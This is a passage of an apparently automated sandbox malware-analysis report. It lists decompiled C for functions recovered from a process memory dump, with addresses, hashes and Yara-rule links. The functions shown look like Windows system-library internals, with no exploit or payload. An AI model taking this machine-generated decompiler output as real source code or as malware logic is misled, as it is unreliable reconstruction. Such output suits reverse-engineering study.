				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E04CF7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E04D57016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                                                                            0x04cdb1e8
                                                                                            0x04cdb1ea
                                                                                            0x04cdb1f3
                                                                                            0x04d34a17
                                                                                            0x04cdb1f9
                                                                                            0x04cdb1f9
                                                                                            0x04cdb1f9
                                                                                            0x04cdb201
                                                                                            0x04d34a21
                                                                                            0x04d34a2e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d34a3b
                                                                                            0x04d34a4d
                                                                                            0x04d34a3d
                                                                                            0x04d34a46
                                                                                            0x04d34a46
                                                                                            0x04d34a55
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04cdb20a
                                                                                            0x04cdb20a
                                                                                            0x04cdb20a
                                                                                            0x04cdb20a

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                            • Instruction ID: 29690b3607a3963bcbdc7e8bb560a4c605a5e38001069dec9455ebfd3565afa6
                                                                                            • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                            • Instruction Fuzzy Hash: D30181323416809BD7229B5DC804F697BDAFF41758F0A40A2FA148B6B1EA79FD00D225
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D6FE87, Relevance: .0, Instructions: 38COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 46%
                                                                                            			E04D6FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x4dcd360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E04CF7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E04D1B640(E04D19AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                                                                            0x04d6fe96
                                                                                            0x04d6fe9e
                                                                                            0x04d6fea1
                                                                                            0x04d6fead
                                                                                            0x04d6feb3
                                                                                            0x04d6feb9
                                                                                            0x04d6fec3
                                                                                            0x04d6fed5
                                                                                            0x04d6fec5
                                                                                            0x04d6fece
                                                                                            0x04d6fece
                                                                                            0x04d6fee0
                                                                                            0x04d6fee1
                                                                                            0x04d6fee3
                                                                                            0x04d6fee8
                                                                                            0x04d6fefb

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 03172c17fc26867b81a4a28bd32cae8b8a2d91f740de3f1f978afc449ceb1726
                                                                                            • Instruction ID: 88b5f7ef65f2fd3d0d306346f6136c30a6e68cacbff308f99f6bf059cc7fb1af
                                                                                            • Opcode Fuzzy Hash: 03172c17fc26867b81a4a28bd32cae8b8a2d91f740de3f1f978afc449ceb1726
                                                                                            • Instruction Fuzzy Hash: DA016270A00209AFCB14DFA8D551A6EBBF4FF08304F1041AAE905DB392D639E905CB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04DA8F6A, Relevance: .0, Instructions: 36COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 48%
                                                                                            			E04DA8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x4dcd360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E04CF7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E04D1B640(E04D19AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                                                            0x04da8f6a
                                                                                            0x04da8f79
                                                                                            0x04da8f81
                                                                                            0x04da8f84
                                                                                            0x04da8f8b
                                                                                            0x04da8f91
                                                                                            0x04da8f94
                                                                                            0x04da8f9e
                                                                                            0x04da8fb0
                                                                                            0x04da8fa0
                                                                                            0x04da8fa9
                                                                                            0x04da8fa9
                                                                                            0x04da8fbb
                                                                                            0x04da8fbc
                                                                                            0x04da8fbe
                                                                                            0x04da8fc3
                                                                                            0x04da8fd6

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 748aa6a3a6bba919a3a2b90e12e027bf54e30da4c3a0ceac6ceefe5790daee8e
                                                                                            • Instruction ID: 5837dd8561de4d119d5bd7eeff0b32c09a3406b52c758b578a6fce07a5ec0a24
                                                                                            • Opcode Fuzzy Hash: 748aa6a3a6bba919a3a2b90e12e027bf54e30da4c3a0ceac6ceefe5790daee8e
                                                                                            • Instruction Fuzzy Hash: E4013174A01209AFDB00EFA8D555AAEB7B4FF08300F50405AB905EB391EA38EA10DB94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D9131B, Relevance: .0, Instructions: 36COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 48%
                                                                                            			E04D9131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x4dcd360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E04CF7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04D1B640(E04D19AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                                                            0x04d9131b
                                                                                            0x04d9132a
                                                                                            0x04d91330
                                                                                            0x04d91336
                                                                                            0x04d9133e
                                                                                            0x04d91341
                                                                                            0x04d91344
                                                                                            0x04d9134f
                                                                                            0x04d91361
                                                                                            0x04d91351
                                                                                            0x04d9135a
                                                                                            0x04d9135a
                                                                                            0x04d9136c
                                                                                            0x04d9136d
                                                                                            0x04d9136f
                                                                                            0x04d91374
                                                                                            0x04d91387

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b3aa75bbb10943eaea0e78a9ac660bc70103eb7ba677ec16883e270b40a01824
                                                                                            • Instruction ID: c67ad10e64a8e2121ba96a001a83c85c156758930879a6c65a632ee89f5b4a81
                                                                                            • Opcode Fuzzy Hash: b3aa75bbb10943eaea0e78a9ac660bc70103eb7ba677ec16883e270b40a01824
                                                                                            • Instruction Fuzzy Hash: 75011D71A01209AFDB04DFA9D555AAEB7F4FF08700F40405AB945EB351E634AA00CB54
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D91608, Relevance: .0, Instructions: 34COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 46%
                                                                                            			E04D91608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x4dcd360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E04CF7D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E04D1B640(E04D19AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                                                                                            0x04d91608
                                                                                            0x04d91617
                                                                                            0x04d9161d
                                                                                            0x04d91625
                                                                                            0x04d91628
                                                                                            0x04d9162b
                                                                                            0x04d91636
                                                                                            0x04d91648
                                                                                            0x04d91638
                                                                                            0x04d91641
                                                                                            0x04d91641
                                                                                            0x04d91653
                                                                                            0x04d91654
                                                                                            0x04d91656
                                                                                            0x04d9165b
                                                                                            0x04d9166e

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1b787f54ff12c47aac372abf2dcb16514923412e507bda6c032b71c7b39ad76b
                                                                                            • Instruction ID: 25281df9078060a8ea893fe8684949e9134a76b282af721e50f63bd5d667ce36
                                                                                            • Opcode Fuzzy Hash: 1b787f54ff12c47aac372abf2dcb16514923412e507bda6c032b71c7b39ad76b
                                                                                            • Instruction Fuzzy Hash: F3F04F71E01259AFDB04DFA8D815A6EB7F4EF18300F44406AA905EB391E634A900CB94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CFC577, Relevance: .0, Instructions: 33COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E04CFC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E04CFC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x4cb11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E04DA88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                                                                            0x04cfc577
                                                                                            0x04cfc57d
                                                                                            0x04cfc581
                                                                                            0x04cfc5b5
                                                                                            0x04cfc5b9
                                                                                            0x04cfc5ce
                                                                                            0x04cfc5ce
                                                                                            0x04cfc5ca
                                                                                            0x00000000
                                                                                            0x04cfc5ca
                                                                                            0x04cfc5c4
                                                                                            0x04cfc5c8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04cfc5ad
                                                                                            0x00000000
                                                                                            0x04cfc5af

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b6beea8fc1f6e05aae499b1179358034fd28ad5875b3e17d92b225c195a32373
                                                                                            • Instruction ID: 29324feacfb5255e5e0c634ab22ed10bdf82c919096975e81e5e0ab8d7a5a42f
                                                                                            • Opcode Fuzzy Hash: b6beea8fc1f6e05aae499b1179358034fd28ad5875b3e17d92b225c195a32373
                                                                                            • Instruction Fuzzy Hash: FBF024B2F152AC8FE7B1CB24C804B227BD6BB04370F485467D60587202C6ACFD80F251
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04DA8D34, Relevance: .0, Instructions: 32COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 43%
                                                                                            			E04DA8D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x4dcd360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E04CF7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E04D1B640(E04D19AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                                                                            0x04da8d34
                                                                                            0x04da8d43
                                                                                            0x04da8d4b
                                                                                            0x04da8d4e
                                                                                            0x04da8d52
                                                                                            0x04da8d5c
                                                                                            0x04da8d6e
                                                                                            0x04da8d5e
                                                                                            0x04da8d67
                                                                                            0x04da8d67
                                                                                            0x04da8d79
                                                                                            0x04da8d7a
                                                                                            0x04da8d7c
                                                                                            0x04da8d81
                                                                                            0x04da8d94

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 933ac540f9f4c1f2f21a0bf7c8de6865d524c4c8ab6119c4b1f7ce585eb4e45f
                                                                                            • Instruction ID: 451fd60c2cb0cd17f9b5c3c8317ef37b2a5fc05c6f467ac4ddc47ade5f2307e9
                                                                                            • Opcode Fuzzy Hash: 933ac540f9f4c1f2f21a0bf7c8de6865d524c4c8ab6119c4b1f7ce585eb4e45f
                                                                                            • Instruction Fuzzy Hash: B1F09070E44608AFDB04EBA8D451A6E77B4EB18300F5080AAF905AB291EA38E900D754
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D92073, Relevance: .0, Instructions: 32COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 94%
                                                                                            			E04D92073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E04D8FD22(__ecx);
				_t19 =  *0x4dc849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x4dc8748; // 0x0
					if(__eflags <= 0) {
						E04D91C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x4dc8724 & 0x00000004;
							if(( *0x4dc8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x4dc8724; // 0x0
					return E04D88DF1(__ebx, 0xc0000374, 0x4dc5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                                                                            0x04d92076
                                                                                            0x04d92078
                                                                                            0x04d9207d
                                                                                            0x04d92083
                                                                                            0x04d920a4
                                                                                            0x04d920aa
                                                                                            0x04d920ac
                                                                                            0x04d920b7
                                                                                            0x04d920ba
                                                                                            0x04d920bc
                                                                                            0x04d920c9
                                                                                            0x04d920c9
                                                                                            0x04d920d0
                                                                                            0x04d920d2
                                                                                            0x00000000
                                                                                            0x04d920d2
                                                                                            0x04d920be
                                                                                            0x04d920c3
                                                                                            0x04d920c5
                                                                                            0x04d920c7
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d920c7
                                                                                            0x04d920bc
                                                                                            0x04d920d4
                                                                                            0x04d92085
                                                                                            0x04d92085
                                                                                            0x04d920a3
                                                                                            0x04d920a3

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e0a1b494ec5ce95e1cf8d0c3f8f75c0971ce4adf6278a62cf1083950b4f85120
                                                                                            • Instruction ID: 6ab2709198369a78ac64f5fa5ba1ef1763498b73789e8ffab4f22f7f9a3e3b51
                                                                                            • Opcode Fuzzy Hash: e0a1b494ec5ce95e1cf8d0c3f8f75c0971ce4adf6278a62cf1083950b4f85120
                                                                                            • Instruction Fuzzy Hash: 46F02766615297BAEF327F25B0206E26BD4E745314B0908C9F45497340C438BC83DA20
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D1927A, Relevance: .0, Instructions: 32COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 54%
                                                                                            			E04D1927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L04CF4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E04D1FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E04D192C6(_t11, _t14);
				}
				return _t11;
			}





                                                                                            0x04d19295
                                                                                            0x04d19299
                                                                                            0x04d1929f
                                                                                            0x04d192aa
                                                                                            0x04d192ad
                                                                                            0x04d192ae
                                                                                            0x04d192af
                                                                                            0x04d192b0
                                                                                            0x04d192b4
                                                                                            0x04d192bb
                                                                                            0x04d192bb
                                                                                            0x04d192c5

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                            • Instruction ID: a3bdd6ccb355584e7260362534bc511b85e6a338f507bd2450f40b20fc482b0f
                                                                                            • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                            • Instruction Fuzzy Hash: A4E0E5723405002BE7219F05EC90B433669EF82724F004079B9041E252C6E9E90987A0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04DA8CD6, Relevance: .0, Instructions: 31COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 36%
                                                                                            			E04DA8CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x4dcd360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E04CF7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E04D1B640(E04D19AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                                                            0x04da8ce5
                                                                                            0x04da8ced
                                                                                            0x04da8cf0
                                                                                            0x04da8cfb
                                                                                            0x04da8d0d
                                                                                            0x04da8cfd
                                                                                            0x04da8d06
                                                                                            0x04da8d06
                                                                                            0x04da8d18
                                                                                            0x04da8d19
                                                                                            0x04da8d1b
                                                                                            0x04da8d20
                                                                                            0x04da8d33

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 09d1dd8f467b8fd59d5b847a39918ee11a1ff87b09030d5ad73bb946339817dc
                                                                                            • Instruction ID: fb95c0208d9aa9d489944284c4477a77c7181ef204b5b840ddf8dd4ae94eeb3a
                                                                                            • Opcode Fuzzy Hash: 09d1dd8f467b8fd59d5b847a39918ee11a1ff87b09030d5ad73bb946339817dc
                                                                                            • Instruction Fuzzy Hash: ACF08270A05249AFDF04EBA8E955E6E77B4EF18304F50019AF916EB3D1EA38E900D754
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CF746D, Relevance: .0, Instructions: 31COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 88%
                                                                                            			E04CF746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E04CEEB70(__ecx, 0x4dc79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E04D195D0();
							L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                                                                            0x04cf746d
                                                                                            0x04cf746d
                                                                                            0x04cf746d
                                                                                            0x04cf7471
                                                                                            0x04cf7488
                                                                                            0x04d3f92d
                                                                                            0x04cf748e
                                                                                            0x04cf7491
                                                                                            0x04cf7495
                                                                                            0x04d3f937
                                                                                            0x04d3f93a
                                                                                            0x04d3f94e
                                                                                            0x04d3f953
                                                                                            0x04d3f956
                                                                                            0x04d3f956
                                                                                            0x04cf7495
                                                                                            0x00000000
                                                                                            0x04cf7488
                                                                                            0x04cf7473
                                                                                            0x04cf7478
                                                                                            0x04cf747d
                                                                                            0x04cf7481
                                                                                            0x00000000
                                                                                            0x04cf7481
                                                                                            0x04cf747d
                                                                                            0x04cf747a
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ab410a3700fb6a4eb6398923c405aa607e091fb8e648466f821bcd51edf1e739
                                                                                            • Instruction ID: c0447a93a336b65705c0f7447becc8b539d0b70c42168f5c11e82a7da1bbafa0
                                                                                            • Opcode Fuzzy Hash: ab410a3700fb6a4eb6398923c405aa607e091fb8e648466f821bcd51edf1e739
                                                                                            • Instruction Fuzzy Hash: 92F0E934A02149AADF819B68CC40F797FB3AF05358F040259DA51A7160F72CF802DF95
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CD4F2E, Relevance: .0, Instructions: 31COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E04CD4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E04DA88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E04CFC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x4cb1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                                                                            0x04cd4f2e
                                                                                            0x04cd4f34
                                                                                            0x04cd4f38
                                                                                            0x04d30b85
                                                                                            0x04d30b85
                                                                                            0x04d30b89
                                                                                            0x04d30b9a
                                                                                            0x04d30b9a
                                                                                            0x04d30b9f
                                                                                            0x00000000
                                                                                            0x04d30b9f
                                                                                            0x04d30b94
                                                                                            0x04d30b98
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d30b98
                                                                                            0x04cd4f3e
                                                                                            0x04cd4f48
                                                                                            0x00000000
                                                                                            0x04cd4f6e
                                                                                            0x00000000
                                                                                            0x04cd4f70

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 03a4a8aefccd77f3d73b898110388faa1553ebbd44cf0839657fcc83f5e5a0fe
                                                                                            • Instruction ID: b9f5c436f8aaadf3b7874b2e3657480ed704d34213d2b1283e1b801a32183312
                                                                                            • Opcode Fuzzy Hash: 03a4a8aefccd77f3d73b898110388faa1553ebbd44cf0839657fcc83f5e5a0fe
